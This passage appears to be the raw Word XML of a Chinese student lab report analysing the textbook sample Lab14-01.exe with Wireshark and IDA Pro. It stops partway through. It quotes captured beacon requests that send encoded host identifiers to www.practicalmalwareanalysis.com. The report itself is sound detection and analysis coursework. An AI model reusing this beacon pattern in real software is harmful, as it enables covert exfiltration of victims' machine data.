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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码分析与防治技术</w:t>
      </w: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hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>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14</w:t>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网络空间安全学院   </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2112060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孙蕗    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验目的</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过网络分析，了解恶意代码的通信模式和特征。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用静态分析工具IDA Pro深入研究代码，识别恶意代码的功能和行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了解恶意代码可能使用的网络库和通信方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分析恶意代码构建网络信令的信息源元素，探讨什么因素可能导致信令的改变。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了解恶意代码是否使用标准的Base64编码，以及编码的不寻常之处。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>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探讨使用网络特征进行恶意代码检测的有效性，识别可能作为检测目标的元素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>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 通过对恶意代码的深入分析，培养对恶意代码分析的能力，了解其工作原理以及可能的防御策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720" w:firstLineChars="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>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利用Wireshark分析捕获的网络流量，识别恶意代码的通信模式和特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>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通过静态分析工具IDA Pro深入研究，深入了解恶意代码的内部结构和功能。通过查看汇编代码、导入函数表等信息，识别恶意代码的行为，包括命令的获取、解码过程和执行过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>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 对恶意代码进行动态分析，通过分析恶意代码的行为、网络通信和编码方案等，揭示其功能和设计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>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Lab14-1</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使用wireshark进行监控网络特征，运行Lab14-01.exe</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left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="378460"/>
            <wp:effectExtent l="0" t="0" r="127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378460"/>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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看到一开始就发送了一个DNS请求，目标地址就是一个网址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。然后可以看到get请求，get的内容似乎是随机的字符串。</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使用这台电脑自带的ie浏览器访问网页，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现正常的浏览器行为与在这个信令中看到的User-Agent匹配，这表明恶意代码很可能使用了COM API接口。比较URI,可以看到aa/a.png似乎是一致的字符串。</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使用动态分析方法，来帮助分析它的功能。运行这个恶意代码，看到如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所示的信令。</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eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GET /NDE6NzM6N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>U6Mjk6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TM6NTYtSm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>obiBTb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>aAaa/a.png HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Accept:*/*</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>UA-CPU:×86</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>User-Agent:Mozilla/4.0(compatible; MSIE 7.0; WindowS NT 5.1;.NET CLR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.0.50727;.NET CLR 3.0.4506.2152;.NET CLR 3.5.30729;.NET4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>C;.NET4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>E)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ww.practicalmalwareanalysis.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection:Keep-Alive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尝试多次运行恶意代码，发现它每次使用了相同信令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>另外一台可用的主机，在它上面尝试运行恶意代码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可能得到如下结果</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>GET /OTY6MDA6QTI6NDY6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tg6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TItdXNlcgaa/a.png HTTP/1.1</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Accept:*/</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Accept-Encoding: gzip, deflate</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User-Agent:Mozilia/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR</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2.0.50727;,NET CLR 1.1.4322;.NET CLR 3.0.04506.30;.NET CLR 3.0.04506.648)</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Host: www.practicalmalwareanalysis.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Connection: Keep-Alive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
